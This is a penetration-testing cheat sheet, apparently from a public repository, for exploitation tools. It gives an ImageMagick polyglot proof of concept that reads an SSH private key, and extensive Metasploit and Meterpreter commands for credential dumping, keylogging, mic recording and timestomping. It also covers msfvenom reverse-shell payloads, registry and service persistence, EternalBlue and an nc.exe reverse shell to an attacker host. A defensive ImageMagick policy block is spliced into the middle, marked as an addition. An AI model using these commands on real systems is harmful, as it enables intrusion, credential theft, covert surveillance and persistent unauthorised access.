08_exploitation_tools.md

File metadata and controls

468 lines (378 loc) · 16.8 KB

Exploitation Tools

Resources

| Name | Description | URL |
| --- | --- | --- |
| Evil-WinRM | The ultimate WinRM shell for hacking/pentesting | https://github.com/Hackplayers/evil-winrm |
| Exploitalert | Listing of latest exploits | https://exploitalert.com |
| Metasploit | Metasploit Framework | https://github.com/rapid7/metasploit-framework |
| TheFatRat | An exploitation tool that compiles malware with a well-known payload; the compiled malware can then be executed on Linux, Windows, macOS and Android. | https://github.com/Screetsec/TheFatRat |

ImageTragick

https://imagetragick.com/

MSL / Polyglot Attack

https://insert-script.blogspot.com/2020/11/imagemagick-shell-injection-via-pdf.html

poc.svg

<image authenticate='ff" `echo $(cat /home/<USERNAME>/.ssh/id_rsa)> /dev/shm/id_rsa`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

Executing Payload

$ convert poc.svg poc.png
$ cp /tmp/poc.svg /var/www/html/convert_images/
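As an added, defender-side example that is not part of the original cheat sheet: an ImageMagick policy.xml that denies the coders the PoC above depends on (MSL for the script itself and PDF, which hands the input to Ghostscript), together with the coder and path rules from the original ImageTragick mitigation. The file location is an assumption; on Debian-based systems it is typically /etc/ImageMagick-6/policy.xml.

```xml
<policymap>
  <!-- Deny the coders the MSL/PDF polyglot above needs:
       MSL scripts and the PostScript/PDF family handled by Ghostscript. -->
  <policy domain="coder" rights="none" pattern="MSL" />
  <policy domain="coder" rights="none" pattern="PDF" />
  <policy domain="coder" rights="none" pattern="PS" />
  <policy domain="coder" rights="none" pattern="EPS" />

  <!-- Coders from the ImageTragick mitigation: remote fetches and
       vector/text formats that can embed commands or read arbitrary files. -->
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="none" pattern="HTTPS" />
  <policy domain="coder" rights="none" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="TEXT" />
  <policy domain="coder" rights="none" pattern="SHOW" />
  <policy domain="coder" rights="none" pattern="WIN" />
  <policy domain="coder" rights="none" pattern="PLT" />

  <!-- Block indirect reads of the form "@/path/to/file". -->
  <policy domain="path" rights="none" pattern="@*" />
</policymap>
```

Confirm the rules are loaded with `identify -list policy`; with this policy in place, `convert poc.svg poc.png` on the PoC above is refused by the policy rather than executed.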

Metasploit

https://github.com/rapid7/metasploit-framework

https://github.com/rapid7/metasploit-payloads

General Usage

$ sudo msfdb run                           // start database
$ sudo msfdb init                          // database initialization
$ msfdb --use-defaults delete              // delete existing databases
$ msfdb --use-defaults init                // database initialization
$ msfdb status                             // database status
msf6 > workspace                           // metasploit workspaces
msf6 > workspace -a <WORKSPACE>            // add a workspace
msf6 > workspace -r <WORKSPACE>            // rename a workspace
msf6 > workspace -d <WORKSPACE>            // delete a workspace
msf6 > workspace -D                        // delete all workspaces
msf6 > db_nmap <OPTIONS>                   // execute nmap and add output to database
msf6 > hosts                               // reads hosts from database
msf6 > services                            // reads services from database
msf6 > vulns                               // displaying vulnerabilities
msf6 > search                              // search within metasploit
msf6 > set RHOST <RHOST>                   // set remote host
msf6 > set RPORT <RPORT>                   // set remote port
msf6 > run                                 // run exploit
msf6 > spool /PATH/TO/FILE                 // recording screen output
msf6 > save                                // saves current state
msf6 > exploit                             // using module exploit
msf6 > payload                             // using module payload
msf6 > auxiliary                           // using module auxiliary
msf6 > encoder                             // using module encoder
msf6 > nop                                 // using module nop
msf6 > show sessions                       // displays all current sessions
msf6 > sessions -i 1                       // switch to session 1
msf6 > sessions -u <ID>                    // upgrading shell to meterpreter
msf6 > sessions -k <ID>                    // kill specific session
msf6 > sessions -K                         // kill all sessions
msf6 > jobs                                // showing all current jobs
msf6 > show payloads                       // displaying available payloads
msf6 > resource /PATH/TO/FILE/<FILE>.rc    // load resource (.rc) file
msf6 > set VERBOSE true                    // enable verbose output
msf6 > set forceexploit true               // exploits the target anyways
msf6 > set EXITFUNC thread                 // payload thread can exit without exiting the host program
msf6 > set AutoLoadStdapi false            // disables autoload of stdapi
msf6 > set PrependMigrate true             // enables automatic process migration
msf6 > set PrependMigrateProc explorer.exe                        // auto migrate to explorer.exe
msf6 > use post/PATH/TO/MODULE                                    // use post exploitation module
msf6 > use post/linux/gather/hashdump                             // use hashdump for Linux
msf6 > use post/multi/manage/shell_to_meterpreter                 // shell to meterpreter
msf6 > use exploit/windows/http/oracle_event_processing_upload    // use a specific module
C:\> Ctrl + z                                    // put the active shell in the background and return to meterpreter
meterpreter > load stdapi                        // load stdapi
meterpreter > background                         // put meterpreter in background (same as "bg")
meterpreter > shell                              // get a system shell
meterpreter > channel -i <ID>                    // get back to existing meterpreter shell
meterpreter > ps                                 // checking processes
meterpreter > migrate 2236                       // migrate to a process
meterpreter > getuid                             // get the user id
meterpreter > sysinfo                            // get system information
meterpreter > search -f <FILE>                   // search for a file
meterpreter > upload                             // uploading local files to the target
meterpreter > ipconfig                           // get network configuration
meterpreter > load powershell                    // loads powershell
meterpreter > powershell_shell                   // follow-up command for load powershell
meterpreter > powershell_execute                 // execute command
meterpreter > powershell_import                  // import module
meterpreter > powershell_shell                   // shell
meterpreter > powershell_session_remove          // remove
meterpreter > powershell_execute 'Get-NetNeighbor | Where-Object -Property State -NE "Unreachable" | Select-Object -Property IPAddress'                                // network discovery
meterpreter > powershell_execute '1..254 | foreach { "<XXX.XXX.XXX>.${_}: $(Test-Connection -TimeoutSeconds 1 -Count 1 -ComputerName <XXX.XXX.XXX>.${_} -Quiet)" }'    // network scan
meterpreter > powershell_execute 'Test-NetConnection -ComputerName <RHOST> -Port 80 | Select-Object -Property RemotePort, TcpTestSucceeded'                            // port scan
meterpreter > load kiwi                          // load mimikatz
meterpreter > help kiwi                          // mimikatz help
meterpreter > kiwi_cmd                           // execute mimikatz native command
meterpreter > lsa_dump_sam                       // lsa sam dump
meterpreter > dcsync_ntlm krbtgt                 // dc sync
meterpreter > creds_all                          // dump all credentials
meterpreter > creds_msv                          // msv dump
meterpreter > creds_kerberos                     // kerberos dump
meterpreter > creds_ssp                          // ssp dump
meterpreter > creds_wdigest                      // wdigest dump
meterpreter > getprivs                           // get privileges after loading mimikatz
meterpreter > getsystem                          // gain system privileges if user is member of administrator group
meterpreter > hashdump                           // dumps all the user hashes
meterpreter > run post/windows/gather/checkvm    // check status of the target
meterpreter > run post/multi/recon/local_exploit_suggester    // checking for exploits
meterpreter > run post/windows/manage/enable_rdp              // enables rdp
meterpreter > run post/multi/manage/autoroute                 // runs autoroutes
meterpreter > run auxiliary/server/socks4a                    // runs socks4 proxy server
meterpreter > keyscan_start                                   // enables the keylogger
meterpreter > keyscan_dump                                    // showing the output
meterpreter > screenshare                                     // realtime screen sharing
meterpreter > screenshare -q 100                              // realtime screen sharing at quality 100
meterpreter > record_mic                                      // recording mic output
meterpreter > timestomp                                       // modify timestamps
meterpreter > execute -f calc.exe                             // starts a program on the victim
meterpreter > portfwd add -l <LPORT> -p <RPORT> -r 127.0.0.1    // port forwarding

Metasploit through Proxychains

$ proxychains -q msfconsole

Meterpreter Listener

Generate Payload

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o meterpreter_payload.exe

Setup Listener for Microsoft Windows

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run

Setup Listener for MacOS

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > set PAYLOAD python/meterpreter/reverse_tcp
PAYLOAD => python/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > exploit

Download Files

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o <FILE>.exe
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
LHOST => <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
LPORT => <LPORT>
msf6 exploit(multi/handler) > run
C:\> .\<FILE>.exe
meterpreter > download *

Enumeration

SNMP Scan

msf6 > use auxiliary/scanner/snmp/snmp_login
msf6 auxiliary(scanner/snmp/snmp_login) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/snmp/snmp_login) > run

SNMP Enum

msf6 > use auxiliary/scanner/snmp/snmp_enum
msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/snmp/snmp_enum) > run

Tomcat Enumeration

msf6 > use auxiliary/scanner/http/tomcat_mgr_login
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/http/tomcat_mgr_login) > run

Exploit Suggester

msf6 exploit(multi/handler) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > set session 1
msf6 post(multi/recon/local_exploit_suggester) > run

Execute Binaries

Port Forwarding with Chisel

meterpreter > execute -Hf chisel.exe -a "client -v <LHOST>:<LPORT> R:1092:socks"

Pivoting

Port Forwarding with Meterpreter

meterpreter > portfwd add -L 127.0.0.1 -l <LPORT> -p <RPORT> -r <RHOST>

SOCKS Proxy on Meterpreter Sessions

msf6 > use auxiliary/server/socks_proxy

Pivoting with Meterpreter

meterpreter > run autoroute -s <XXX.XXX.XXX>.0/24
meterpreter > background
msf6 > use auxiliary/scanner/portscan/tcp

Auxiliary Handling

Auxiliary Setup

msf6 > use auxiliary/scanner/http/tvt_nvms_traversal
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set RHOSTS <RHOST>
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > set FILEPATH Users/Nathan/Desktop/Passwords.txt
msf6 auxiliary(scanner/http/tvt_nvms_traversal) > run

Auxiliary Output Directory

/home/kali/.msf4/loot/20200623090635_default_<RHOST>_nvms.traversal_680948.txt

Persistence

Setting up Persistent Access

$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f exe -o shell.exe

Copy exploit to target machine

msf6 > use exploit/windows/local/persistence
msf6 > set session 1
msf6 > set payload windows/meterpreter/reverse_tcp

Persistence through persistence_service

msf6 > use exploit/windows/local/persistence_service
msf6 > set session 2
msf6 > set lport 5678
msf6 > exploit
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost <LHOST>
msf6 > set lport 5678
msf6 > exploit

Persistence through Persistence_exe

msf6 > use post/windows/manage/persistence_exe
msf6 > set session 1
msf6 > set rexepath /root/payload.exe
msf6 > exploit
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost <LHOST>
msf6 > set lport 1234
msf6 > exploit

Persistence through Registry

msf6 > use exploit/windows/local/registry_persistence
msf6 > set session 1
msf6 > set lport 7654
msf6 > exploit
msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost <LHOST>
msf6 > set lport 7654
msf6 > exploit

Exploit Handling

web_delivery Handler

msf6 > use exploit/multi/script/web_delivery
msf6 exploit(multi/script/web_delivery) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/script/web_delivery) > set LHOST <LHOST>
msf6 exploit(multi/script/web_delivery) > set SRVHOST <LHOST>
msf6 exploit(multi/script/web_delivery) > set SRVPORT 80
msf6 exploit(multi/script/web_delivery) > set target 2
msf6 exploit(multi/script/web_delivery) > set LPORT 445
msf6 exploit(multi/script/web_delivery) > run -j

Example Execution

$ crackmapexec smb <RHOST> -u <USERNAME> -p <PASSWORD> --local-auth -M web_delivery -o URL=http://<LHOST>/j0wUlo2EX

WP Shell Upload

msf6 > use exploit/unix/webapp/wp_admin_shell_upload
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set PASSWORD P@s5w0rd!
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set USERNAME admin
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set TARGETURI /wordpress
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set RHOSTS <RHOST>
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LHOST <LHOST>
msf6 exploit(unix/webapp/wp_admin_shell_upload) > set LPORT <LPORT>
msf6 > run

Example Execution

meterpreter > cd C:/inetpub/wwwroot/wordpress/wp-content/uploads
meterpreter > execute -f nc.exe -a "-e cmd.exe <LHOST> <LPORT>"

Dedicated Exploits

msf6 exploit(multi/handler) > use exploit/windows/local/ms10_015_kitrap0d
msf6 exploit(windows/local/ms10_015_kitrap0d) > set session 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST <LHOST>
msf6 exploit(windows/local/ms10_015_kitrap0d) > set payload windows/meterpreter_reverse_tcp
msf6 exploit(windows/local/ms10_015_kitrap0d) > exploit

Additional Options

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LPORT <LPORT>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST <LHOST>
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS <RHOST>
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit -j
msf6 exploit(windows/smb/ms17_010_eternalblue) > sessions -i 1

Meterpreter SSL Certificate Validation

https://www.darkoperator.com/blog/2015/6/14/tip-meterpreter-ssl-certificate-validation

msf6 > use auxiliary/gather/impersonate_ssl
msf6 auxiliary(gather/impersonate_ssl) > set RHOST www.google.com
msf6 auxiliary(gather/impersonate_ssl) > run
msf6 auxiliary(gather/impersonate_ssl) > use payload/windows/meterpreter/reverse_http
msf6 payload(windows/meterpreter/reverse_http) > set stagerverifysslcert true
msf6 payload(windows/meterpreter/reverse_http) > use payload/windows/meterpreter/reverse_https
msf6 payload(windows/meterpreter/reverse_https) > set stagerverifysslcert true
msf6 payload(windows/meterpreter/reverse_https) > set HANDLERSSLCERT /home/<USERNAME>/.msf4/loot/20240229080801_default_142.250.186.164_142.250.186.164__899022.pem
msf6 payload(reverse_https) > set LHOST <LHOST>
msf6 payload(reverse_https) > set LPORT <LPORT>
msf6 payload(reverse_https) > generate -t exe -f /tmp/<FILE>.exe
msf6 payload(reverse_https) > use exploit/multi/handler
msf6 exploit(handler) > set LHOST <LHOST>
msf6 exploit(handler) > set LPORT <LPORT>
msf6 exploit(handler) > set HANDLERSSLCERT /home/<USERNAME>/.msf4/loot/20240229080801_default_142.250.186.164_142.250.186.164__899022.pem
msf6 exploit(handler) > set stagerverifysslcert true
msf6 exploit(handler) > exploit -j

searchsploit

$ searchsploit <NAME>
$ searchsploit --cve <CVE>
$ searchsploit -m <ID>
$ searchsploit -x <ID> / <PATH>